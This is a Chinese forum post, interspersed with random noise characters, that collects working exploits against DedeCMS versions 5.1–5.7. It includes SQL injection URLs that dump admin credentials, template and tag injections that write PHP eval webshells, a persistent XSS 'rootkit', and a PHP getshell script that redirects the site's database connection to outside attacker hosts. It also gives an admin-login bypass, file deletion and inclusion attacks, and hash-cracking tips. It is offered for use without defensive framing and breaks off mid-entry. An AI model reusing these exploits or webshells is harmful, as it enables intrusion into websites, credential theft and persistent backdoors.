|
|
- K5 l- v/ U% @
Dedecms 5.6 rss注入漏洞 J$ e a& ?; U4 o& Z
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1: h( j0 C2 o h0 u& r: g/ i
3 o1 ~ x( R( z9 L3 i
8 j% w* Z; A* Q* m
$ N& W* X& Q4 z2 m2 W7 j1 A% H) U$ K0 q2 L
1 Q, W5 s: S: B) D2 Q
$ n" c5 V" W" S7 ?/ G
) S* B5 J) M# \/ b- @
7 o# O. b, @4 ^: A/ L# LDedeCms v5.6 嵌入恶意代码执行漏洞, u9 K; s- m' W' z/ I3 B4 l' b. ?
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
0 X) [: t m% W! g3 Q' ^发表后查看或修改即可执行
5 V, @: t1 \$ d- p7 ?1 }a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}$ @& k( l. k ?; I
生成x.php 密码xiao,直接生成一句话。8 g# ?" e3 r% c9 O8 e
G( ~/ p0 i" e3 h( S& h7 M, B/ G- x, `+ X: ~& M7 u, \) M
+ E! y; ^# o* Z! @1 T/ I! |
0 K$ D1 z W& A9 ?5 Q6 @- Z/ F7 _# ]) v7 n/ k
% _( D& _. X+ v- b6 g! h; K( c+ |3 _0 |* Q
& q4 f/ h$ i& }2 ]2 PDede 5.6 GBK SQL注入漏洞
- f* `2 n, G0 p. Bhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';2 S: _. Q' d3 O; _+ r
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe$ l# i- O& ^( f# f8 u$ G
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7, P+ C9 L2 h' \9 d1 \( u& Q
7 ?; o- L* O2 @4 w
8 q- J: u% U; N+ @' b9 q2 J X: D2 B% B8 a
- o0 S5 S% ~0 j4 \0 i
1 d I- }( G2 p. |
: y Y6 ~* x' @1 \+ m& Q c K# T1 o3 _( R( F' h: f2 w: _ j
6 w5 K4 U% ^! @% L
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞8 C( c9 P4 d+ p
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
/ J2 A- G9 M i2 K8 m
1 \5 a/ |: ]- }" s3 n5 U4 i
2 s$ |9 q9 }4 D
( ^% ]5 g) L% k: l$ {* a. }( T. W0 W+ s! o, H0 }
! u7 K/ B, P; I. P2 G- B
) ?- {9 x4 c" jDEDECMS 全版本 gotopage变量XSS漏洞
+ a+ Y1 U7 l* }/ N0 G- c( r5 C1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 * ?* L) z" l0 y3 ~0 Y, e% I3 f
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="% K; F# f: M/ Y7 z
7 ~8 S. S8 B$ P9 {; H0 Z P
2 _4 w) R* H0 c. e2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
' c" i x9 G4 C5 m/ M) ?http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda1 f; {4 i$ T1 D: }- L" h
( y* M' m4 m1 n& `, T: T! A, A0 P' p- Q; ^
http://v57.demo.dedecms.com/dede/login.php' V" c( M, A9 w2 G* u% {7 Z
) L; c0 L5 I- l! I& n% e) S' Q& U& r9 M ~" d
color=Red]DeDeCMS(织梦)变量覆盖getshell
) U$ P7 J. }0 s0 w( I( ~" i#!usr/bin/php -w: `6 J, a K" k, k r b
<?php1 l( h3 E7 C) t% b0 t5 [. z1 d
error_reporting(E_ERROR);
0 g" Z* e7 j+ `$ `set_time_limit(0);
" x A. J$ N+ D% u& B2 Bprint_r('% `% o" ^# R" C* I6 C# d6 |: v
DEDEcms Variable Coverage9 z9 _- \ L& Z! A6 X. ^ s
Exploit Author: www.heixiaozi.comwww.webvul.com
- n& S# r2 `! T);
/ J( N; {5 _& p, d7 d- d4 necho "\r\n";
2 a% r5 S# p4 \/ P6 A3 m/ V9 Rif($argv[2]==null){
* \7 L4 q9 R3 tprint_r('$ l5 c8 q" ?! j' [
+---------------------------------------------------------------------------+( ]5 ^9 p& M& x- S
Usage: php '.$argv[0].' url aid path
" N. E- h0 Y( Yaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/7 ?+ j3 s; c ~- ~% h7 m' ?
Example:0 r- w+ B; ~5 ?6 s- a0 u1 {4 e, i
php '.$argv[0].' www.site.com 1 old
8 Z- }; J" C+ d3 E4 K/ X+---------------------------------------------------------------------------+6 e( h, m7 @# |: a* m; A W( {$ U
');) k r& y; a4 `
exit;
' P2 q7 f9 b" J/ Q}4 K' [+ F, ]3 o6 ?- E
$url=$argv[1];
2 ^" G( e7 U$ Z' n5 e$aid=$argv[2];3 }; H8 V4 p9 g
$path=$argv[3];
( O/ G% x& j% s- i$ }! k5 V/ A$exp=Getshell($url,$aid,$path);/ [: V" d' B; f
if (strpos($exp,"OK")>12){+ T0 U# [$ h- m* }* x. I8 } P; E
echo "6 q3 x, {/ R5 Q5 A/ L4 D' C4 y% A
Exploit Success \n";
6 S+ K9 Z( ^; l: |if($aid==1)echo "
" Y( [9 ~) g% p( C' V* a3 zShell:".$url."/$path/data/cache/fuck.php\n" ;
; M: `8 G) t+ e9 d3 D. i9 t! t6 d+ I+ U5 N( Y
' d% _( a) Y, n: r! N. J& cif($aid==2)echo "
, K& \. B" j* e6 Q9 yShell:".$url."/$path/fuck.php\n" ;1 y6 E0 |! d) R2 n+ Z6 P! _
- P( m7 q, A2 y# ]" H, k
4 \" }5 n+ q$ ]+ \5 H8 }if($aid==3)echo "1 N0 [2 x& L5 `" v
Shell:".$url."/$path/plus/fuck.php\n";* a/ G* Y$ g( Z* q
4 U3 z3 Q/ M* @* {" i
+ f! p8 K" P( a8 O) _
}else{
' _6 _! B& }( a( n' H1 G2 jecho "5 C! r! }8 F3 Y/ ]* b% _
Exploit Failed \n";
2 @5 y- K+ ]) m G}6 v& Z0 a! a& p
function Getshell($url,$aid,$path){/ D9 z$ P0 K; ~( t
$id=$aid;
5 z: A, T9 q0 x% g( X8 {# E/ x$host=$url;
5 p, ]) h2 i" k6 V7 V3 i$port="80";
$ B" T% x0 N! `1 j2 k( o4 V; A+ T5 v: D$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
, ^, j/ }. l8 B) [5 ^1 |$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
7 h9 p" J( k2 h. ]# n! x- C7 p6 n$data .= "Host: ".$host."\r\n";; p% C3 g" w+ Y2 y
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
& a! X0 j) x- K$ y9 W( j$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";1 v& m* B4 K; ]1 K( ?8 d. U
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
9 K4 n. \ b u4 N" q* j//$data .= "Accept-Encoding: gzip,deflate\r\n";# L& E/ {7 x, I1 `
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";; i- U; z& y& | Z2 E$ S2 F
$data .= "Connection: keep-alive\r\n";
( _; j7 P6 @& j* X5 t+ ^/ d0 C$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
+ [8 F6 B- l3 h+ E8 S ~( [: _$data .= "Content-Length: ".strlen($content)."\r\n\r\n";4 v+ T* l% j8 l8 ]4 |% `# @
$data .= $content."\r\n";' \2 `* {# F# C2 A4 U: i5 e w2 C
$ock=fsockopen($host,$port);! {; J1 A- Z' A9 i- S6 X1 l
if (!$ock) {" M' n3 Q' I0 c, ~ E, o) @3 R# `5 n8 e
echo "7 [5 H0 R H6 G. Z+ ]) d
No response from ".$host."\n";8 O, C: x6 [8 W4 I) G% p, U# |: Y
}
; U; k0 d$ E3 O4 V% Q! ofwrite($ock,$data);! t. x+ H$ n) A' ]# @ c5 M
while (!feof($ock)) {: f) G3 c2 r: _+ N
$exp=fgets($ock, 1024);
l/ R* a; k/ c6 ?- areturn $exp;
* Z! O4 v, f- C& {3 S}
+ |: H; K* ?- U. H( _* N) B}
* w: l+ b @: V6 I
5 g8 L4 H( w0 C4 p
~! ~3 O/ i, W?>
) R6 N1 R5 {8 i
O1 i0 a& q( ]" h$ U; ^( f W- j9 h5 s1 \4 v' s. A" J( i4 Y3 B
( I; o- ]# F1 }
1 I# I- f/ C* V3 P- C
7 W3 j1 I9 p# s W# J8 h- C6 S, b; k
/ g1 k0 a4 G1 T# E
4 n* E- p6 t1 E4 e* v
& e$ w0 h- a( R* |
k' {2 S5 N# W; `' ]5 X$ M) |; l5 w% @
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台) m( F2 h, l8 D8 X$ B. Y( I
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
4 @8 T' k' N5 d6 U5 G- Q1 R9 n( Z/ H; d
- X) S, Z( U( c; U3 g
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
9 f9 _/ b' _9 Q& i& f2 w% M* Z1 o
" S2 Z* r7 R! n3 h
$ r2 |" d; r3 X此漏洞的前提是必须得到后台路径才能实现* l: T6 Q' [; s+ M1 g
. L. Y3 P! {# c! `: \2 y/ M
0 f& L- | V/ \3 x K9 g7 p1 y
% B% Y+ Z C" w( [6 E! P
0 [. m) ` I3 v- l* [9 \
% ~6 m H0 r. C5 }" y7 N" P
7 I5 p. K) o. u- |, M8 R4 Z; U C( [: H- b: y G7 }* {
4 Z3 Q& H9 f" m S
' J; p' `5 ^- G: u2 R4 ]$ `$ Z6 g9 H; l6 N7 b: j( ^. }* c
Dedecms织梦 标签远程文件写入漏洞/ `) R( N, V' }7 N r& ?) y0 m
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
7 L' R# F( X) f. a8 N& U7 K( a0 c/ q% T: G" U$ R
; ^" r1 B& ^, P- X# T* J8 {0 Z) B. n
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 * s7 w+ x. S! N7 {& u* p2 l/ G
<form action="" method="post" name="QuickSearch" id="QuickSearch">7 f1 f: V* _, x# y" q3 d7 I) v
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /># F+ T- Q. |. o8 N( j9 X. \/ Z1 H5 _
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
. L' d1 {+ g& ?6 r1 A! w7 g<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />1 V1 r) e5 ?8 u7 [1 H F% s
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />. g# z. N" k+ Z M
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />6 Z5 D/ T/ V* b- v( Y4 f8 H% f
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
+ T- }$ S) R$ b2 W2 P" r<input type="text" value="true" name="nocache" style="width:400">
% N! n( `% E6 f0 M/ l0 k9 D<input type="submit" value="提交" name="QuickSearchBtn"><br />
0 v/ Q( p/ C7 K+ m* c( C3 S</form>
/ \, D% X8 a4 B, l7 m<script>
: ~2 f' p# k% H4 Ufunction addaction()
& l! u: Z" |' z$ d f5 n{" d/ e. r- k0 \- X; k0 A
document.QuickSearch.action=document.QuickSearch.doaction.value;
9 a7 s; Z4 d3 L5 P) q; m}3 x4 K A4 L ?. Y J, F
</script>
& C* l- _- J3 V- k0 W4 g) c x6 A5 R2 i B. S$ D. q- k# S5 `
0 d4 T4 ?7 D" s: R1 W: ]- \
: V; s% ^$ \/ a: \3 P
2 @- E! B9 X1 s
$ p+ c1 T5 Y2 D5 Q3 n! u# j: @9 D; M
8 F! F/ Y# ^7 e( V
; f$ }" R* E$ o6 X$ \$ R8 H, R
, |" _( i# ~+ T8 p y+ |5 ?4 _8 i6 ?9 `) G/ v# m q- f
DedeCms v5.6 嵌入恶意代码执行漏洞
1 l+ L$ f% b6 }' Z: C2 `! {注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行/ K3 |" W- C' t9 ~/ f
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}: G' J0 A! R# A, @) H7 J; B) a
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
. A# F! N6 C1 {1 jDedecms <= V5.6 Final模板执行漏洞7 G8 U$ s" S& V) T2 b5 Z
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
6 ]( P5 H* C& H9 \1 S, Q! y, vuploads/userup/2/12OMX04-15A.jpg$ e2 f5 i" H1 l7 y8 w1 n8 h0 M0 @
) Z* D) g$ ^6 F4 j
3 ]/ T; |$ D/ O1 i7 k" W4 E
模板内容是(如果限制图片格式,加gif89a):. c9 ~! ]/ S9 m8 B
{dede:name runphp='yes'}: A, q) o* d* p9 {5 i
$fp = @fopen("1.php", 'a');
/ e1 B) C( T+ Q0 ]- U6 t6 B; k@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");; u8 E+ Z6 g& q
@fclose($fp);
( H( E: e4 Y" |6 B/ Z% m{/dede:name}/ ?" T4 V# O( y( o3 u! m. v2 Z
2 修改刚刚发表的文章,查看源文件,构造一个表单:9 u6 F. _+ [1 f8 g
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
) S* ^2 w# k4 v9 \: q<input type="hidden" name="dopost" value="save" />4 I2 X3 A9 V3 l( R' \
<input type="hidden" name="aid" value="2" />$ _- \# P/ w& ?
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
( z' E( T* o- F; R. \. x<input type="hidden" name="channelid" value="1" />
$ C( V" {0 h( W# M<input type="hidden" name="oldlitpic" value="" />1 s2 r3 ?9 H; J, I( z- A9 i. S
<input type="hidden" name="sortrank" value="1275972263" />
: Z* C6 P" a1 ^. }0 d* z7 W- p
; |7 C& U: e- z# P; o+ S9 P+ O/ c* j1 p3 C3 P2 q9 A
<div id="mainCp">/ ^2 W) L# H: ^: W7 H' n
<h3 class="meTitle"><strong>修改文章</strong></h3>
% w# \9 `' A4 t5 i1 U. R6 E+ V, d1 D) K: N0 s' R3 m- a
( H5 l5 X5 A1 Z
<div class="postForm">8 W. |7 Y" V; r$ w9 J7 X% q( y
<label>标题:</label>
/ R0 |8 W8 s7 T8 ^; x2 o* G4 c9 p<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
9 F: z9 k4 [7 d+ r, w7 [' e" p- v
& @. g2 W6 ]# J6 }9 w. e2 J) A7 M- V$ K$ }4 d# U' i# P" I
<label>标签TAG:</label>; y F) `) ~9 b; W+ Z- @# S0 y' n
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
6 Y9 T, b7 V& }9 }/ J, V% @. K- W) e+ p, b2 g
8 r! n/ L4 g1 ~) o<label>作者:</label>
0 ]: C3 v) {5 c4 m<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>* i# n/ _* d* U
7 ^1 o" e7 t( E+ d2 L/ v! P; g0 d+ t1 |) S6 o
<label>隶属栏目:</label>7 w- F1 i9 D* {3 K5 D. @5 \5 }& @
<select name='typeid' size='1'>
! \6 [; y% `: }9 c* c/ ]5 P<option value='1' class='option3' selected=''>测试栏目</option>* g7 H1 J$ F$ r- V+ W
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
- Q/ i- u% z) K9 D+ P; [8 A: Z9 D+ ~0 _
% B" \ m2 T5 ?$ H9 z7 X3 A
<label>我的分类:</label>9 k2 W# [, y1 V+ v7 _
<select name='mtypesid' size='1'>- _/ d5 ~; v$ U" v2 @9 l7 ]- S2 x
<option value='0' selected>请选择分类...</option>
( t' z, i5 Y9 l<option value='1' class='option3' selected>hahahha</option>
3 N# W: N" @- V; b+ C) ]</select>
0 H2 v1 }, H( R! C3 J0 a$ W
% Z1 } q, O6 e; b: X# Y x6 h" H
* i; ], `9 L% g9 n, v<label>信息摘要:</label>: I" l6 j* `2 M. m" }
<textarea name="description" id="description">1111111</textarea>
% L( {$ f* w4 P4 O+ p(内容的简要说明)
' _9 I3 ], ^, M$ w' ?* i
s0 c. y( e$ k# S) \. l- U1 l/ Y( b- @ r: i
<label>缩略图:</label> V: r8 X/ o }( G
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
8 H! H) A( a w& Z$ W, e. O ^1 z6 s1 r% K! |; e! ]. E$ O6 E
0 p6 x" H/ t( E; x7 u8 j<input type='text' name='templet'% K6 X2 C7 p* `( s# h6 V
value="../ uploads/userup/2/12OMX04-15A.jpg">
( U4 K' k9 H5 x- l<input type='text' name='dede_addonfields'
5 k; j& j( ~ m1 N; z( Q% Bvalue="templet,htmltext;">(这里构造)- j3 w" V. P6 _. e# P0 c+ y
</div>
9 ~: y" k& }9 l6 |. n7 y* l4 H( p7 D
2 x7 `: Q+ _: n
<!-- 表单操作区域 -->
( N$ Z6 V( j( T8 s& W5 \<h3 class="meTitle">详细内容</h3>
* k: y% _( j, x5 Y- t
. G3 j, i1 p }5 y+ ?" Y: \8 p' D* x" l9 ~
<div class="contentShow postForm">
4 X( o* e. @, V- ?: T<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
& E: Q8 `, @; G* F5 q4 v2 Z0 g5 ] k- i4 V- b8 o1 b& d
; ?3 A% m0 q' j. m<label>验证码:</label>9 O. \/ [2 }# [9 i9 N9 g: J
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
; h/ E! i* b5 K$ T0 S& J<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
$ d+ u& K! f& i( o/ M# V
7 j9 }: P6 S" p, p) b |; I
; l* ~2 G" X; R4 N% T6 ~, u8 g<button class="button2" type="submit">提交</button>. p8 s" g8 ~, F( F# j; O
<button class="button2 ml10" type="reset">重置</button>; x4 D- G0 w7 |6 w; g6 d
</div>$ w$ O0 `) _7 c+ B" s
: h' Q! Q( \" x* l" m
- D2 I4 J0 G& n# w6 [</div>
; Q7 D \; ]' z
$ g# y" p2 `3 U5 G Z+ g# P$ m% A' {
</form>
# q! b+ U$ E& |, m+ h+ J
) M3 i! |1 F2 {' ^+ z
% L8 g/ P" p$ F提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:5 I g1 k6 C' }( W
假设刚刚修改的文章的aid为2,则我们只需要访问:
3 l' R3 Z+ V+ ` Zhttp://127.0.0.1/dede/plus/view.php?aid=2
- K) `1 z: o6 V) F3 v8 c' m9 u即可以在plus目录下生成webshell:1.php3 O5 L8 T& c# W0 ^$ d6 n
6 Y( `" M" Y! x X0 n8 B1 V
- ~5 }3 D d2 L5 G8 I7 r! d4 s% T1 a! M6 o& M2 J! F! p# ?0 H
& d( l `/ u1 F. W1 L' S! s9 B2 g! q/ k2 S. d
/ J k# {# _1 m8 X7 D, D* `* [% G) ~: ?) n% a# |
: q: d/ ~$ J: r9 k+ a v4 ^# T$ E7 G: N1 D
3 n& l5 }$ ~% e% [
6 x* w2 P- e: l2 V7 x
+ l5 J, g: {8 T: B4 {" tDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
& b: i$ B/ T H; u" wGif89a{dede:field name='toby57' runphp='yes'}" w* Y# f1 C( b3 k/ o
phpinfo();+ K+ e, w% K$ G0 _) t& f
{/dede:field}: c7 C9 M7 H2 u. ]1 w
保存为1.gif N- b# ~0 ]* |' B
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> f* b$ @3 z& M4 D0 |/ D1 A
<input type="hidden" name="aid" value="7" />
0 C9 z+ P4 E! Z5 m, a<input type="hidden" name="mediatype" value="1" /> 0 p( m/ \* X4 }
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> + U* T2 |; J& x5 ]
<input type="hidden" name="dopost" value="save" />
G c6 b2 H2 }<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
G3 s' o r( m, W- H& L<input name="addonfile" type="file" id="addonfile"/>
, H8 @) o- h2 Y6 n# q5 F<button class="button2" type="submit" >更改</button>
( S9 S/ X4 i) `, N1 K4 S</form>
1 N D: W9 U! H! @5 s7 k# P
5 b4 S7 o) C- ^% g- X) T1 c- o2 Z$ U
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
& t1 `$ e/ {3 G |7 M0 w发表文章,然后构造修改表单如下:
1 x+ G( e9 p- j- Y& X
; J: Q- l5 `' t# f+ v4 j
4 | Y* i- w8 B: X; v* g. k<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> , o$ Y' y S) A7 K
<input type="hidden" name="dopost" value="save" /> % \0 H \- B: L* [
<input type="hidden" name="aid" value="2" /> % o b, ^, J! f1 q% n. U4 S# ]
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
+ }. ^3 a f% N; Z: b/ c<input type="hidden" name="channelid" value="1" /> M g+ Z4 i; G j$ J. O
<input type="hidden" name="oldlitpic" value="" /> 2 C! {! ^6 h) N2 i2 R2 M
<input type="hidden" name="sortrank" value="1282049150" />
- @ a) h3 E! Y& @7 K. G<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> : f6 X( T. I8 T; n5 ]8 j6 N/ g
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> ( W, o+ k; q! t
<select name='typeid' size='1'>
+ V% Z0 O% M1 Z) {8 u- J<option value='1' class='option3' selected=''>Test</option> / P9 y" {* U! ~/ D! D
<select name='mtypesid' size='1'> 2 g6 J5 k8 T/ c J7 k5 ^5 d. K
<option value='0' selected>请选择分类...</option>
, B0 T5 l9 l c5 F<option value='1' class='option3' selected>aa</option></select> 9 Q, ^9 c7 `7 {. b, T" R6 e* ?& `
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 8 T1 C% l& G; p
<input type='hidden' name='dede_addonfields' value="templet">
+ T2 C/ @7 m5 l9 T2 }$ D<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
& W/ s5 p+ z4 g, B7 m! t<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> ) e/ ?- }0 o8 N9 D j. `0 b a
<button class="button2" type="submit">提交</button>
) [' p6 C: s, e: e. a+ V8 L% Y</form>
: r- q, O. G5 w( A$ C0 M2 m3 }$ [# B$ g( t; x* A0 C
, @! y- s1 ]: W: w! c, Q4 V1 r0 G7 P
2 Z# M7 e3 l* U! H& ]# l7 Z
% q) q: F! B+ W) j" m3 F4 a4 \$ R/ Y' z
& U% `' [$ M$ p
% k2 `3 ^1 \* T' j. ~3 O7 `. {: k' G7 S9 z* u
' ]4 P& ~$ x/ m/ U& b7 s: C% u% w' h! |' r) X
3 t# v X# Q ]/ L4 h6 ^) t
! |9 _' M7 q4 N$ D( j0 p2 K K+ Y, V: h# i; o( ]
织梦(Dedecms)V5.6 远程文件删除漏洞
% H, S; }( x6 A4 ?- whttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
) S; @" G% t1 G* y- C' q2 W, X7 Y7 v2 V! _
. R2 d9 p0 [1 ~" G% a+ k2 V0 K% w* I3 N: M0 Z2 |+ O
" D1 G+ j, L" ~1 Y. j3 u7 A
3 \- X( a! q/ ~* Q
2 _ w$ r$ s0 o' B
0 j; u1 q. S' ^7 b- p: N9 D3 g& K9 B: i$ O
1 T8 P O- a+ p) w6 L: c7 Q0 a# B
$ Z% R# w; h6 V! f" u) H" ?织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
( t" b+ @% f0 m$ V, r, I. [http://www.test.com/plus/carbuya ... urn&code=../../' K, [; D1 U; X" I) c% s
) v$ d* ^# _) v0 c. d. p+ a+ X( n; @7 i1 g8 x
' X1 a7 a+ \4 T2 ?3 i1 V9 W7 F
6 P; A0 p6 H. `7 e* M' p
; W4 J: L2 v& r# Z: w/ O2 ]
" A) P) Z% w. g: T4 Z. y# u/ d" w
3 y# v9 W" W% n, d/ Y2 j% W* J# j7 K7 h: ~
! N5 S p& Y J7 o
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
9 r+ |9 @. F0 x+ s/ O& a9 i% x; lplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
) C3 H) D( Y t& z7 r5 [密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
/ y! v6 e9 ^0 J Q; ]: |0 M2 ~
& c' w6 L, `( ?6 }) g) C# O6 L9 D% M& `% P- a
( C0 a) u! [; W6 J* i, w( |, E4 S( ^9 o; r
; D- y7 `9 n% F/ ]
0 X& I" q+ z% T {0 I8 y2 P5 `+ O- q7 H" u% l( _
4 o4 ~1 z I% o& D
! I8 w% c& Z2 C2 V0 z& `
8 k. d: J( V6 y6 ?, p- S织梦(Dedecms) 5.1 feedback_js.php 注入漏洞. n/ z. d; N }/ J+ ^# \
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
/ i2 b/ n3 I# b7 a8 _/ N- A* h% w# q8 O. N
- H. Z" R' H! C) |3 ?- C8 S0 l) R
3 ^; a- z H) O+ U2 O3 ^% H$ d) `0 B' r
1 `" s( b Z5 {- @; x# G8 ^1 e8 G6 n& P. z8 N1 {7 t
9 k$ h' _ D- i+ f/ r) K8 `( O! {
* z% U5 Z# N0 f1 c3 _4 Z$ w8 z3 b, T' B5 p9 t
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
; B1 U2 v$ d% E2 ?<html>7 R- b9 }- i' X! u2 ^4 n* }
<head>
